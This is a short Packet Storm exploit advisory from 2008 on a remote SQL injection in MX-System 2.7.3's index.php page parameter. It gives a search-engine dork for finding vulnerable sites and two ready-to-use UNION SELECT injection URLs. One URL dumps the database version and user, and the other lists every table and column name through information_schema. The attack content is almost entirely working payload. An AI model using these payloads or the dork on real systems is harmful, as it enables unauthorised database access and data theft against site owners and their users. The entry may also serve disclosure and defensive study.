mxsystem-sql.txt

2008-05-20T00:00:00
ID PACKETSTORM:66558
Type packetstorm
Reporter cOndemned
Modified 2008-05-20T00:00:00

Description

                                        
                                            `Name : MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability  
Author : cOndemned  
Dork : intext:Powered by MX-System 2.7.3  
Greetz : ZaBeaTy, str0ke, doctor, Avantura </3  
  
PoC :  
  
http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat_ws(char(58),version(),user(),now())/*  
http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat(table_name,char(58),column_name)+from+information_schema.columns/*  
  
SQL query will generate error page containing requested informations.  
  
`